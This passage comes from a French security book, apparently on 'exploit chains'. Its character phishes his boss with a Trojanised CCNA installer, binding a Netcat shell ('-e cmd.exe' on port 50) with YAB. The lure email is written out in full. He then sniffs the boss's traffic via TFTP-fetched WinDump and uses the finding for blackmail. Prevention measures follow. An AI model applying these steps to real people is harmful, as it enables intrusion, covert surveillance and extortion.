Pour commencer, Phnix doit copier le site web sur son propre serveur web. Loutil Wget (www.gnu.org/software/wget) fait partie des utilitaires les plus populaires pour faire cela. Wget est un utilitaire en ligne de commande disposant de beaucoup doptions utiles (reportez-vous www.gnu.org/software/wget/manual/wget.html pour obtenir une liste des options). Phnix, dans son cas, utilise la syntaxe suivante :
wget -m -r -l 12 www.certificationpractice.com

1. N.D.T. : Netcat est, initialement, un outil rseau tout fait lgitime. Il permet denvoyer et de recevoir des communications TCP/IP et est particulirement utile pour dboguer certains programmes rseau. Sil peut tre utilis, comme dans cet ouvrage, pour ouvrir un port linsu dun utilisateur, il ne sagit pas en soi dun logiciel dangereux et vous pouvez tre amen linstaller et lutiliser de manire courante.

Chapitre 2

Espionner votre chef

35

Figure 2.7
Site web de Certication Practice.

Voici la signication des options :


m m m

-m. Fait un miroir du site web. -r. Rcupre de manire rcursive les pages lies sur la premire page. -l 12. Limite la rcursivit 12 niveaux. Si Phnix nindique pas une limite raisonnable, il peut se retrouver tlcharger un nombre important de pages web. Si ce nombre est trop petit, il ne copiera pas sufsamment de contenu du site web pour le rpliquer sur son serveur.

Cette commande copie le site web dans un rpertoire nomm www.certificationpractice.com sur son disque dur. Cela copie galement lexcutable ccna.exe (voir Figure 2.8), que Phnix pourra ensuite lier avec le cheval de Troie.

36

Chanes dexploits

Figure 2.8
Wget.

Comme beaucoup de programmes dinstallation, le logiciel est un excutable compress. Plutt que de double-cliquer dessus, Phnix le dcompresse avec WinZip. La Figure 2.9 montre un exemple de menu contextuel, obtenu en cliquant avec le bouton droit, contenant les options pour extraire les chiers. Phnix doit les extraire car il va utiliser les chiers contenus dans lexcutable compress pour crer un nouvel excutable contenant lutilitaire crant un point dentre (backdoor). Une fois les chiers dcompresss, Phnix renomme le chier setup.exe sous un autre nom, comme backup.exe. Phnix crera plus tard un nouveau chier setup.exe. Installer les programmes De nombreux programmes dinstallation contiennent la fois un chier setup.exe et un chier setup.lst auquel setup.exe fait rfrence. Si vous renommez setup.exe, noubliez pas de copier le chier setup.lst avec le mme nom. Par exemple, si vous renommez setup.exe en backup.exe, copiez setup.lst en backup.lst.

Chapitre 2

Espionner votre chef

37

Figure 2.9
Extraction de lexcutable.

Lier le cheval de troie lexcutable Lier un cheval de Troie un excutable lgitime est une mthode courante utilise par les pirates pour amener les utilisateurs installer des logiciels malveillants sur leurs ordinateurs. Les programmes crant le lien, que lon appelle aussi enveloppeurs de chevaux de Troie (Trojan wrappers), combinent un programme original et un cheval de Troie pour crer un nouvel excutable. Dans cet exemple, Phnix utilise Yet Another Binder (YAB)1, que lon trouvait lorigine sur areyoufearless.com (le site nhberge plus YAB, mais vous pouvez trouver cet utilitaire gratuit via des services de partage de chiers comme BitTorrent ou sur dautres sites web tels que astalavista.net ou packetstormsecurity.org).

1. N.D.T. : YAB est dtect comme un cheval de Troie par de nombreux antivirus. Cela est probablement d la prsence du morceau de code servant lier les deux excutables lantivirus ne fait pas la diffrence entre lutilitaire et lexcutable li un cheval de Troie. Nous dclinons cependant toute responsabilit en cas de perte de donnes ou, de manire gnrale, de problmes subsquents lutilisation de ce logiciel dans un environnement non contrl. Par ailleurs, les antivirus dtectent les logiciels modis laide de YAB.

38

Chanes dexploits

Lorsquil dmarre YAB, Phnix voit lcran prsent en Figure 2.10.

Figure 2.10
Yet Another Binder.

Phnix clique sur le symbole + pour afcher la fentre Add Bind File Command prsente la Figure 2.11. Phnix congure les options comme indiqu dans le Tableau 2.1 pour prparer son cheval de Troie :
Tableau 2.1 : Options de Yet Another Binder

Option Select command to add: Source File Path:

Valeur Bind File C:\nc.exe

Description Cette option permet de lier un fichier un autre. Chemin vers Netcat sur lordinateur de Phnix.

Chapitre 2

Espionner votre chef

39

Tableau 2.1 : Options de Yet Another Binder (suite)

Option Execution Method:

Valeur Execute asynchronously

Description Cette option installe le cheval de Troie sparment de lexcutable principal. Il arrive que lancer les deux excutables en mme temps (de manire synchronise, synchronously) pose problme : lexcution asynchrone est une option plus sre. Cette option congure Netcat pour quil coute (option -L) en tche de fond les connexions entrantes sur le port TCP 50. Loption -e cmd.exe indique Netcat dexcuter linterprteur de commandes MS-DOS.

Execution Parameters:

-p 50 -e cmd.exe -L

Figure 2.11
Ajout de Netcat.

40

Chanes dexploits

Phnix peut aussi choisir, de manire optionnelle, de lancer le cheval de Troie au dmarrage de lordinateur en modiant loption Registry Startup Method. Par exemple, Phnix peut la congurer pour modier HKEY_LOCAL_MACHINE\Microsoft\Windows\Current Version\Run an que le cheval de Troie soit lanc chaque dmarrage de lordinateur. Par dfaut, YAB ne modie pas la base de registre. Phnix clique sur OK une fois Netcat congur. Puis, il ajoute le programme lgitime en cliquant sur le symbole + (signe plus) pour lajouter. Il choisit Execute File dans la liste droulante (voir Figure 2.12). Il saisit le chemin complet de lexcutable backup.exe, laisse les autres options leur valeur par dfaut et clique sur OK. Avant de lier les deux excutables ensemble, il sassure que toutes les traces de Netcat disparatront une fois quil aura t lanc. Cela sert viter que les utilisateurs ne dtectent le logiciel malveillant sur leur ordinateur. Les outils de liaison dexcutables ont souvent une option pour supprimer toute trace de lexcutable malveillant une fois quil est lanc en mmoire vive. Choisir de fusionner les chiers est idal pour viter la dtection, mais cela a un effet de bord : si le chier est supprim, Phnix ne peut pas le redmarrer lorsque lordinateur dmarre. Il choisit de fusionner Netcat en allant dans le menu Options et en y choisissant Melt Stub After Execution (voir Figure 2.13).

Figure 2.12
Ajouter lexcutable.

Chapitre 2

Espionner votre chef

41

Figure 2.13
Option Melt Stub After Execution.

Pour que son cheval de Troie semble lgitime, Phnix choisit une icne qui ressemble un programme dinstallation classique. Dans la fentre Icon Preview, il clique sur (none) pour afcher la bote de dialogue Change Icon. Il peut alors choisir une icne ressemblant un programme dinstallation classique. Les icnes 7 et 8 sont deux options possibles (voir Figure 2.14). Phnix peut maintenant lier Netcat lexcutable backup.exe. Il clique sur le bouton Bind File. Son cheval de Troie est prt : il lenregistre sous le nom setup.exe. Comme linstallation dpend de beaucoup dautres chiers, Phnix doit crer une archive auto-extractible contenant tous les chiers ncessaires linstallation. Il lance WinZip Self-Extractor et choisit Self Extracting Zip for Software Installation (voir Figure 2.15). Phnix choisit Unzip automatically (voir Figure 2.16) pour que lutilisateur ne voie pas larchive. Lorsque lassistant lui demande le nom de lexcutable dmarrer lorsque le chier est dcompress, il choisit setup.exe (voir Figure 2.17). Lorsque son chef lancera le programme de CCNA, il dcompressera les chiers et lancera setup.exe, ce qui installera la fois le programme lgitime dentranement lexamen et Netcat. Netcat fonctionnera en tche de fond et coutera les connexions entrantes sur le port TCP 50 (Transmission Control Protocol).

42

Chanes dexploits

Figure 2.14
Choisir une icne.

Figure 2.15
WinZip Self-Extractor.

Chapitre 2

Espionner votre chef

43

Figure 2.16
Dcompresser automatiquement.

Figure 2.17
Excuter setup.exe une fois larchive dcompresse.

44

Chanes dexploits

Mettre en place le site web servant lhameonnage Phnix a cr un nouveau programme hberger sur son site web dhameonnage (phishing). Il donne au chier le mme nom que le programme original (ccna.exe) provenant du site web lgitime et le copie dans le mme rpertoire que le chier ccna.exe quil a rcupr (et lcrase donc). Pour que son pige apparaisse aussi lgitime que possible, il dcide denregistrer un nom de domaine proche du nom de domaine du site web quil utilise. Le site web original est certicationpractice.com : il enregistre donc certication-practice.com. Il dispose maintenant dun site web compltement fonctionnel, dont le nom est analogue celui du site web original, et dun cheval de Troie qui se fait passer pour une application lgitime de rvision pour les examens.
ATTENTION En recopiant le site web, Phnix a enfreint les lois relatives aux droits dauteur. Il risque galement des poursuites pour chaque personne tlchargeant et excutant le logiciel quil fournit.

Envoyer un courrier lectronique M. Vtille Phnix a copi un site web, cr un cheval de Troie et il hberge un nouveau site web avec un lien vers ce nouvel excutable. Tout cela ne servira rien moins quil narrive amener son chef, M. Vtille, visiter le site web et tlcharger le cheval de Troie. La mthode la plus simple pour cela est denvoyer son chef un courrier lectronique semblant provenir du site web hberg par Phnix. Lorsque son chef regardera le champ From: du courrier lectronique, il devra voir une adresse provenant du domaine certication-practice.com et non ladresse de Phnix. M. Vtille ne pourra dcouvrir ladresse relle quen examinant les en-ttes du message. Peu de gens savent lire les enttes dun courrier lectronique et, mme lorsque cest le cas, la plupart des gens ne les afchent pas dans leur logiciel de courrier lectronique. Phnix pourrait certes envoyer un message partir du client de son bureau, mais cela faciliterait son pistage au cas o quelquun examinerait les en-ttes du courrier lectronique. Pour couvrir ses traces, il utilise un service de messagerie anonyme comme mail.com. Son mode opratoire est donc le suivant : 1. enregistrer une adresse anonyme chez mail.com ; 2. crer un message pour amener son chef visiter le site web servant lhameonnage et tlcharger lexcutable du CCNA li avec le cheval de Troie ;

Chapitre 2

Espionner votre chef

45

3. modier le champ From: du message pour quil contienne le domaine certicationpractice.com. Enregistrer une adresse anonyme chez mail.com est simple. Phnix va sur www.mail.com et souscrit au service de courrier lectronique gratuit et anonyme. la diffrence dautres services qui vous imposent de saisir une adresse lectronique alternative, votre adresse postale ou dautres informations personnelles, les sites tels que mail.com ne demandent rien1. Cet anonymat protge Phnix des enquteurs capables de le tracer.
INFO Si un pirate veut davantage de protection, il peut passer par un serveur mandataire (proxy) anonyme. Anonymization.net et TorPark sont des serveurs mandataires.

Phnix utilise ensuite les instructions de mail.com pour congurer son client de courrier lectronique. Il dcide dutiliser Outlook Express. Vous pouvez vous demander pourquoi Phnix a besoin dun compte anonyme sil change de toute faon le champ From:. Changer le champ From: est sufsant pour piger lutilisateur, mais pas pour induire en erreur un enquteur examinant les en-ttes du message. Phnix change donc le champ From: et utilise conjointement un service de courrier lectronique anonyme. Phnix crit alors un message sufsamment convaincant pour que son chef soit amen, par ingnierie sociale, visiter le site web et tlcharger le cheval de Troie. Un bon message dhameonnage doit suivre ces recommandations :
m

Le message ne doit pas contenir de faute dorthographe ou de grammaire. Les gens sont moins susceptibles de croire un message bourr de fautes car il parat non professionnel. Le message doit proposer une offre gratuite. Tout le monde aime les cadeaux. Le message doit expliquer pourquoi les victimes obtiennent quelque chose gratuitement. Les gens savent que rien nest rellement gratuit et quil doit y avoir une contrepartie. Sans justication de la gratuit, les victimes deviennent

m m

1. N.D.T. : La politique de mail.com semble avoir chang depuis la publication amricaine de cet ouvrage. Il existe cependant de nombreux fournisseurs dadresses anonymes une simple requte sur un moteur de recherche vous le dmontrera.

46

Chanes dexploits

mantes. Elles ne pensent pas ncessairement un hameonnage, mais peuvent suspecter une arnaque quelconque. Si un pirate prsente une offre gratuite, les victimes veulent savoir pourquoi elles sont susceptibles de bncier de cette offre gratuite.
m

Le message doit faire en sorte que les utilisateurs non souponneux aient une bonne opinion deux-mmes. Il sagit globalement dune campagne marketing visant ce que les victimes tlchargent le logiciel. En ce qui concerne les professionnels des technologies de linformation (comme cest le cas pour le chef de Phnix dans ce scnario), la meilleure approche est de leur faire sentir que sils utilisent le produit, ils seront plus intelligents et brillants que sils ne lutilisent pas. Le message doit tre bref. Les gens ont plus tendance lire un message court quun message long. Phnix doit garder le courrier lectronique bref pour augmenter la probabilit que son chef le lise.

Voici une suggestion de message remplissant ces critres :

Objet : Logiciel gratuit dentranement lexamen CCNA Cher M. Vtille, Tlchargez aujourdhui votre examen gratuit dentranement au CCNA pendant quil est encore temps ! En tant que professionnel des technologies de linformation, vous savez quune certification augmente normment votre valeur nette, vos comptences techniques au sein de votre organisation et la reconnaissance de vos collgues. Nos tudes montrent que les professionnels titulaires de la certification CCNA gagnent en moyenne 15 % de plus que les autres. Certification Practice Exams est heureux doffrir, pour une priode de temps limite, un logiciel gratuit dentranement lexamen CCNA pour tous les utilisateurs enregistrs sur cisco.com. Cela reprsente une valeur de 95 ! Pourquoi vous offrir cela ? La raison en est trs simple : lorsque vous aurez utilis notre logiciel pour obtenir votre examen CCNA ds la premire tentative, nous sommes confiants sur le fait que Certification Practice Exams sera votre interlocuteur de choix pour vos futurs tests de certifications Cisco. Notre seule demande est que,

Chapitre 2

Espionner votre chef

47

une fois votre examen obtenu, vous envisagiez de faire appel nous pour vos besoins futurs en formation pour de tels examens. Pour tlcharger votre test dentranement au CCNA, allez ladresse http:// www.certificationpractice.com/ccna et cliquez sur le lien CCNA.exe. Bien cordialement, Certification Practice Exams

Vous avez peut-tre remarqu que ladresse du site web est celle du site lgitime et non celle du site servant lhameonnage cr par Phnix. Cela est intentionnel. Phnix aurait pu mettre son nom de domaine, mais un message dhameonnage doit paratre aussi lgitime que possible. Ce message fait rfrence au site web original, mais Phnix a modi le code HTML qui fait un lien vers le site servant lhameonnage 1. Pour faire cela, Phnix ouvre le code source du message et modie le lien pour quil pointe vers le faux site web ladresse http://www.certication-practice.com/ccna (voir Figure 2.18). De cette manire, le texte du message fait rfrence au vrai site web, mais le code redirige le chef de Phnix sur le faux site web. Lorsquil sera sur le site web de Phnix, M. Vtille ne remarquera probablement pas que le nom du site est diffrent. Quand bien mme ce serait le cas, ladresse est sufsamment proche du vrai domaine pour quil ne sen proccupe pas. Pour encourager encore un peu plus son chef, Phnix laborde et mentionne quil pense lui-mme passer la certication CCNA. En parlant de la certication, Phnix fait passer une suggestion subtile dans lesprit de son chef propos de lexamen de la certication. Ce type de suggestion peut aider considrablement dans le cadre de la manipulation visant ce que son chef tlcharge le logiciel. Phnix fait ngligemment la remarque suivante : "Jai reu un mail dune de ces entreprises de prparation aux tests aujourdhui. En avez-vous reu un ? Je nai pas encore regard en dtail, mais a semble pas mal comme site." Comme M. Vtille aime la comptition, Phnix en rajoute encore un peu et espre le pousser tlcharger le logiciel en disant : "Vous savez, je

1. N.D.T. : Notons que de plus en plus de clients de courrier lectronique sont maintenant capables de dtecter ce type de mthode. En loccurrence, et tant donn la similarit des deux adresses web, il y a moins de chances que lattention de M. Vtille soit attire par un tiret de trop dans le nom de domaine que par un avertissement de son client de courrier lectronique lui indiquant la supercherie

48

Chanes dexploits

Lien vers le site web servant l'hameonnage

Figure 2.18
Modication du lien.

parie que jaurai mon CCNA avant vous. Je vais chercher des examens dentranement ds ce soir pour commencer rviser." Phnix envoie le message, se cale dans son fauteuil et attend. Lorsquil recevra le message, M. Vtille sera tent de tlcharger le logiciel de Phnix. Le test dentranement et Netcat seront tous deux installs sur lordinateur de M. Vtille. Netcat y attendra une connexion sur le port 50.

Chapitre 2

Espionner votre chef

49

Trouver lordinateur de M. Vtille Ltape suivante consiste dcouvrir ladresse IP de lordinateur de M. Vtille. Une mthode est dutiliser un logiciel nomm Angry IP Scanner (http:// www.angryziber.com/), qui parcourt une plage dadresses IP pour dcouvrir quels htes sont actifs. La Figure 2.19 prsente un exemple de scan de la plage 192.168.1.0/24.

Figure 2.19
Angry IP Scanner.

Maintenant que Phnix a une liste dhtes sur le rseau, il peut utiliser un scanneur de ports pour dterminer quels htes coutent sur le port 50 (cest--dire le port sur lequel il a congur Netcat). Phnix fait appel Angry IP Scanner. La Figure 2.20 montre la sortie du scanneur de ports. Notez que le port 50, sur lequel Netcat coute, est ouvert.

50

Chanes dexploits

Figure 2.20
Sortie du scanneur de ports dAngry IP Scanner.

Se connecter lordinateur du chef Lordinateur du chef a pour adresse IP 192.168.1.5. Maintenant que Phnix connat ladresse IP et quil a vri que le port TCP 50 tait ouvert, il peut se connecter lordinateur de M. Vtille. Phnix ouvre un interprteur de commandes MS-DOS et navigue vers le rpertoire o se trouve sa propre copie de Netcat. Il saisit la commande suivante pour se connecter lordinateur de son chef :
nc 192.168.1.5 50

Il vrie quil est connect lordinateur de son chef grce loutil ipconfig, intgr Windows. Il afche 192.168.1.5 (ladresse IP de lordinateur de son chef) : il est donc bien connect lordinateur de M. Vtille (voir Figure 2.21). Pour Phnix, ltape suivante est de tlcharger un logiciel de capture de paquets sur lordinateur de son chef. Il dcide dutiliser un programme en ligne de commandes car il ne peut pas afcher de programme graphique de manire distante avec Netcat. Comme Windows fournit un client TFTP, Phnix peut congurer un serveur TFTP sur son ordinateur et tlcharger le logiciel de capture de paquets sur lordinateur de

Chapitre 2

Espionner votre chef

51

Figure 2.21
Connexion lordinateur de M. Vtille.

M. Vtille. Phnix utilise le serveur Tftpd32, disponible ladresse http:// tftpd32.jounin.net/ : il est gratuit et simple utiliser. Tftpd32 lance cependant plusieurs services dont Phnix na pas besoin : il les coupe ds le dpart en dcochant les autres protocoles dans la bote de dialogue Settings. Phnix tlcharge galement WinDump (http://www.winpcap.org/windump/), un programme populaire de capture de paquets, et le place dans le rpertoire o est install Tftpd32. Phnix revient la connexion Netcat sur lordinateur de son chef. Il y tlcharge WinDump depuis son ordinateur. La syntaxe du client TFTP de Windows est la suivante :
tftp [-i] hte [put | get] source destination

Loption -i indique au client TFTP de procder un transfert binaire (WinDump est un chier binaire, il faut donc utiliser cette option). Ladresse IP de Phnix est 192.168.1.6.

52

Chanes dexploits

Il saisit donc la commande suivante sur lordinateur de son chef pour tlcharger WinDump :
tftp -i 192.168.1.6 get windump.exe windump.exe

Phnix lance ensuite WinDump, dont les options sont nombreuses. Les options sont sensibles la casse : il doit faire attention lorsquil saisit ses commandes ne pas faire derreur, ce qui pourrait faire planter le programme. Phnix ne sintresse quaux options suivantes :
m

-c nombre. Cette option ne capture quun certain nombre de paquets. Sans cette option, WinDump continue capturer des paquets et remplit le chier de journalisation. -s taille. Cette option spcie la taille des paquets capturs. Sans cette option, certains paquets seraient coups et Phnix ne pourrait pas les rassembler.

-w chier. Cette option enregistre tous les paquets capturs dans un chier de journalisation.

La commande suivante capture jusqu 500 paquets et les envoie dans le chier capture.log :
windump -c 500 -s 1500 -w capture.log

Cest ici que commence lattente. Phnix doit attendre que son chef ait envoy ou reu 500 paquets. Il saura que cest fait lorsque WinDump se sera arrt et lui aura rendu la main sur linvite de commande. WinPcap WinDump, comme la plupart des logiciels de capture de paquets, requiert la bibliothque WinPcap (Windows Packet Capture, capture de paquets sous Windows). WinPcap est disponible gratuitement ladresse www.winpcap.org. De nombreux utilitaires rseau utilisent cette bibliothque. Dans une situation comme celle de ce chapitre, il est probable quun administrateur rseau travaillant dans les technologies de linformation ait dj install WinPcap.

Chapitre 2

Espionner votre chef

53

Si ce nest pas le cas, Phnix doit copier les chiers et les installer manuellement. WinPcap utilise normalement un installeur graphique mais, comme Phnix utilise Netcat pour se connecter lordinateur de son chef en ligne de commande, il ne peut pas utiliser doutil graphique. Si Phnix devait installer WinPcap avec la ligne de commande, la procdure serait la suivante : 1. tlcharger WinPcap, mais ne pas linstaller ; utiliser WinZip pour dcompresser lexcutable auto-extractible ; 2. utiliser TFTP pour copier les chiers daemon_mgm.exe, NetMonInstaller.exe, npf_mgm.exe, rpcapd.exe et Uninstall.exe dans un rpertoire, par exemple C:\Program Files\Winpcap sur lordinateur distant ; 3. copier netnm.pnf dans C:\windows\inf ; 4. copier packet.dll, pthreadvc.dll, C:\windows\system32 ;
wanpacket.dll

et

wpcap.dll

dans

5. copier npf.sys dans c:\windows\system32\drivers ; 6. aller dans le rpertoire cr ltape 2 et y excuter ces commandes :
npf_mgm.exe -r daemon_mgm.exe -r NetMonInstaller.exe i

Phnix aurait alors install la bibliothque WinPcap sur lordinateur de son chef. Analyser les paquets capturs Lorsque WinDump se termine, Phnix a normalement captur sufsamment de paquets pour reconstruire ce que son chef visite sur Internet. Il ne simpatiente pas trop : il sait quil doit auparavant copier le chier de journalisation sur son ordinateur. Il utilise TFTP, comme il la fait prcdemment, pour transfrer le chier depuis lordinateur de M. Vtille vers son propre ordinateur. Pour cela, il saisit la commande suivante sur lordinateur de son chef :
tftp -i put 192.168.1.6 capture.log

54

Chanes dexploits

Si Phnix tentait douvrir le chier dans un diteur de texte, il verrait quil est difcile lire. Pour faciliter linterprtation de la sortie, il limporte dans Wireshark (autrefois nomm Ethereal), disponible ladresse www.wireshark.org. Il dmarre Wireshark, choisit File > Open et importe le chier capture.log. La Figure 2.22 est un exemple de ce que pourrait dcouvrir Phnix dans ce chier.

casino.jpg

Figure 2.22
Wireshark.

Phnix remarque alors quelque chose dintressant. La ligne en surbrillance prsente une requte HTTP GET pour un chier nomm casino.jpg. Son chef visiterait-il des sites de jeux en ligne pendant les heures de bureau ? Pour le savoir, Phnix doit suivre le ux TCP et rassembler le chier.

Chapitre 2

Espionner votre chef

55

Il clique du bouton droit sur la requte HTTP GET et choisit dans le menu Follow TCP Stream. Cela lui afche la fentre prsente la Figure 2.23.

Figure 2.23
Suivre le ux TCP.

Le dbut de la sortie montre la requte HTTP GET suivie de la rponse du serveur web. Son chef naviguait apparemment sur le web pendant que Phnix capturait des paquets. Phnix veut voir les images de la page web que son chef regardait. Malheureusement, celles-ci sont des chiers binaires : il ne pourra donc pas les voir directement. Phnix nest pas inquiet : il sait quil peut rassembler une image laide dun diteur hexadcimal.

56

Chanes dexploits

Rassembler les images Phnix enregistre la sortie au format brut en cliquant sur loption Raw (dans le coin infrieur droit) et en cliquant sur le bouton Save As. Il enregistre le chier sous le nom output.raw. Il lance ensuite WinHex (www.x-ways.net/winhex), un diteur hexadcimal populaire sous Windows, et choisit Fichier > Ouvrir pour ouvrir output.raw. La Figure 2.24 illustre les donnes brutes telles quelles sont afches dans WinHex.

yo y

Figure 2.24
Flux TCP brut dans WinHex.

Cela ne ressemble pas grand-chose pour linstant, mais il va bientt recrer limage originale. Phnix sait quil doit supprimer len-tte HTTP GET et ne laisser que limage (sil y avait eu du code HTTP aprs limage, il aurait d le supprimer galement). Pour cela, il doit supprimer tout ce qui prcde le dbut du chier binaire de limage. Les images JPEG commencent par les caractres . Avec sa souris, Phnix slectionne

Chapitre 2

Espionner votre chef

57

tout le texte de la troisime colonne jusqu . Pour supprimer len-tte HTTP, il slectionne le texte supprimer et appuie sur Ctrl+X pour le couper du chier. Il dispose prsent du chier source de limage et peut aller dans le menu Fichier et y choisir Enregistrer sous (voir Figure 2.25).

Figure 2.25
Enregistrer le chier image source.

Puis, il ouvre limage quil vient de rassembler (voir Figure 2.26). Bingo ! Son chef regardait apparemment un site de casino en ligne pendant ses heures de travail. Phnix vient de conrmer que son chef faisait deux poids, deux mesures. M. Vtille exige de ses subordonns quils ne surfent pas sur Internet pendant leurs heures de travail alors quil se rend lui-mme coupable de cette infraction. Arm de

58

Chanes dexploits

Figure 2.26
Image que regardait M. Vtille.

cette connaissance, Phnix peut lutiliser des ns dingnierie sociale, pour du chantage ou pour plaisanter avec ses collgues. Phnix imprime limage et dpose une copie sur le bureau de son chef le lendemain matin avant quil narrive. Dans la journe, une note est envoye aux employs, leur signiant que leur utilisation dInternet ne sera plus surveille. Phnix sourit en ralisant que son plan a fonctionn : son chef a t pris la main dans le sac et ne surveillera plus son accs au web.

Chapitre 2

Espionner votre chef

59

En-ttes de fichiers dans la sortie hexadcimale Vous pouvez aussi regarder directement la sortie hexadcimale pour dterminer le type de fichier. Par exemple, les fichiers JPEG commencent par les valeurs hexadcimales FF D8 FF. Pour connatre cette valeur ainsi que dautres valeurs den-ttes pour divers types de fichiers, visitez le site www.filext.com.

Autres possibilits Lexemple montre que le chef de Phnix ne regarde que des sites de jeux en ligne, mais il aurait pu trouver littralement nimporte quoi. Et si son chef avait regard des sites pornographiques ? Phnix aurait pu utiliser ces informations pour le faire chanter ou le faire licencier. Daprs un sondage de PC World en 2005, presque la moiti des 500 plus grosses entreprises amricaines ont eu grer au moins un incident impliquant un employ protant de son ordinateur de bureau pour regarder des sites pornographiques. Plutt que de trouver un casino en ligne ou des sites pornographiques, Phnix aurait pu capturer le mot de passe envoy en clair du site web de courrier lectronique de son chef. Avec ce mot de passe, Phnix aurait pu se connecter la place de M. Vtille et lui faire quelques plaisanteries, par exemple envoyer des messages aux amis de sa liste de contacts confessant une addiction lalcool ou une drogue, ou encore quil trompe sa femme. Les possibilits de ce que Phnix peut dcouvrir sont innies. Rsum de la chane dexploits Rsumons les tapes de la chane dexploits de Phnix : 1. Il a copi un site web lgitime pour mettre en place un pige par hameonnage. 2. Il a combin Netcat avec un logiciel lgitime.

60

Chanes dexploits

3. Il a mis en place un nouveau site web et envoy un courrier lectronique son chef avec une adresse usurpe. 4. Il a scann le rseau pour trouver ladresse IP de son chef. 5. Il sest connect lordinateur de son chef grce Netcat et, grce TFTP, il a tlcharg WinDump. 6. Il a captur les paquets envoys et reus par lordinateur de son chef pendant que celui-ci surfait sur Internet. 7. Il a copi les paquets capturs sur son ordinateur et a ouvert le chier avec Wireshark. 8. En voyant quune image avait t transfre, il a sauv la sortie en tant que donnes brutes et a ouvert ce chier dans WinHex. 9. En utilisant WinHex, il a supprim len-tte HTTP, sauv limage originale et la ouverte.

Mesures de prvention
Examinons prsent les diverses mesures que vous pouvez dployer dans votre environnement pour vous protger contre ce type dattaque. Mesures contre les attaques par hameonnage Mettre en place un site web pour quil se fasse passer pour un site web lgitime est une attaque connue sous le nom dhameonnage. La plupart des gens pensent que lhameonnage est utilis pour rcuprer des mots de passe ou des numros de carte de crdit mais, comme vous lavez vu dans ce chapitre, de telles techniques peuvent tre utilises bien dautres ns. Lhameonnage est avant tout une tactique dingnierie sociale. Se protger contre ces attaques requiert des garde-fous la fois humains et techniques. Le garde-fou humain est la formation. Offrez des formations de routine, afchez des panneaux et formez tous les nouveaux employs aux dangers de lingnierie sociale. Apprenez-leur ne pas ouvrir les messages provenant de gens quils ne connaissent pas et ne pas visiter de sites web qui leur paraissent suspects. Expliquez-leur quils doivent tre particulirement attentifs aux messages qui les invitent tlcharger des logiciels depuis un site web quils ne connaissent pas.

Chapitre 2

Espionner votre chef

61

Les garde-fous techniques incluent les ltres antispam et antihameonnage. La plupart des messages dhameonnage, y compris celui qui est prsent dans ce chapitre, sont envoys sous la forme de spams. Un ltre antispam centralis pour tous les messages entrants li un ltre local sur les ordinateurs des utilisateurs est un moyen de se protger contre ces attaques. Lautre garde-fou technique, le ltre antihameonnage, peut aider dans une certaine mesure mais nest pas une solution infaillible. Internet Explorer partir de la version 7.0 et Mozilla Firefox partir de la version 2.0 contiennent tous deux des outils antihameonnage. Vous pouvez aussi installer des barres doutils antihameonnage, disponibles sur des sites comme netcraft.com. Mesures contre les chevaux de Troie Comme pour les tentatives dhameonnage, se protger contre les chevaux de Troie implique des lments techniques et humains. Formez vos utilisateurs pour quils ninstallent jamais de logiciels non autoriss sur votre rseau. Mettez en place une politique qui interdit linstallation de logiciels non approuvs et qui indique les consquences doutrepasser cette interdiction. La solution technique comprend deux volets. Assurez-vous dabord que vous disposez des dernires signatures de votre logiciel antivirus. La plupart des antivirus dtectent Netcat. Mais des variantes de Netcat existent ; on peut par exemple citer Cryptcat (http://sourceforge.net/projects/cryptcat/), une version chiffre de Netcat1. Il existe galement des organisations clandestines proposant de modier, moyennant nance, un programme quelconque (par exemple Netcat) pour quil ne corresponde pas une signature connue. Dautre part, utilisez une politique de groupe sur votre domaine interdisant aux utilisateurs dinstaller des logiciels sur leurs ordinateurs. Certains utilisateurs (en particulier dans la hirarchie) peuvent ne pas aimer cela, mais vous pouvez minimiser les plaintes en leur expliquant que les protger et protger lentreprise contre les attaques est dans leur intrt.

1. N.D.T. : Comme Netcat, Cryptcat prsente de nombreuses utilisations parfaitement lgitimes et vous pouvez linstaller vous-mme, par exemple pour mettre en place un tunnel chiffr entre deux machines.

62

Chanes dexploits

Mesures contre les logiciels de capture de paquets Si lattaquant est all sufsamment loin pour lancer un logiciel de capture de paquets, vos problmes dpassent largement la situation simple dun attaquant qui capture quelques paquets. Vous pouvez cependant vous en protger. Tout dabord, pour vous protger contre les attaques bruyantes discutes la section "Pour plus dinformations", utilisez des commutateurs dont les ports sont scuriss. Les ports scuriss permettent de se protger contre lempoisonnement ARP, lusurpation dadresse MAC et linondation dadresses MAC : seules certaines adresses MAC sont autorises se connecter un port donn du commutateur. Deuximement, utilisez un IPS pour vous alerter et vous protger des empoisonnements ARP et des inondations dadresses MAC. Un IPS peut vous alerter si un attaquant essaie de capturer du trac sur le rseau. Troisimement, vous pouvez utiliser une application comme PromiScan (www.securityfriday.com/products/promiscan.html), qui parcourt votre rseau la recherche dhtes dont linterface rseau est en mode espion (promiscuous). Les applications de capture de paquets utilisent souvent ce mode sur la carte rseau, de sorte quun utilitaire comme PromiScan peut vous alerter si quelquun excute un logiciel de capture de paquets sur votre rseau. Pour nir, utilisez sur les htes des logiciels de dtection dintrusion comme Cisco Secure Agent ou des pare-feu logiciels qui vous alerteront chaque fois quune nouvelle application essaiera de dmarrer. Cela peut vous avertir que quelquun est en train dessayer de dmarrer un logiciel de capture de paquets sur votre ordinateur.

Conclusion
Les piges par hameonnage, les chevaux de Troie et les logiciels de capture de paquets sont tous des menaces pour les rseaux daujourdhui. Lespionnage rseau a lieu tous les jours. Les employeurs espionnent leurs salaris, les salaris espionnent leurs employeurs et les entreprises sespionnent entre elles. Au nal, vous choisissez dabandonner toute vie prive chaque fois que vous vous connectez au rseau de votre entreprise.

3
Faire planter le site web de votre concurrent
Scnario
Il est 16 h 30 et Phnix a assez vu son chef pour aujourdhui. Il range ses affaires et se prpare quitter le bureau tout en rfrnant son envie de lui dire daller voir ailleurs sil y est, entre autres amabilits. Alors quil se dirige vers la gare, son tlphone portable sonne pour lui signaler quil a reu un texto. Le numro qui safche est 0000000000 et le message est "Endroit habituel, 18 h". Phnix est submerg dun mlange de confusion, de colre et de peur. Il sait de qui vient le message. Mais il a jet depuis plusieurs mois le tlphone quil avait utilis pour communiquer avec M. Dobbs, un personnage louche avec lequel il avait travaill quelquefois. Lespace dun instant, Phnix se demande comment diable ce type a rcupr son numro de tlphone mobile personnel, avant de raliser que cest idiot de se poser la question. Dobbs lui a dit quil le surveillerait jamais : il tient parole. Une fois dans le train, Phnix se tte pour savoir sil doit aller au caf habituel et attendre M. Dobbs ou sil doit ignorer le message et continuer vivre sa vie. Son hsitation est brve. Il se souvient des menaces profres par M. Dobbs dans le pass et dcide que lignorer nest probablement pas une bonne ide. "Prochain arrt, 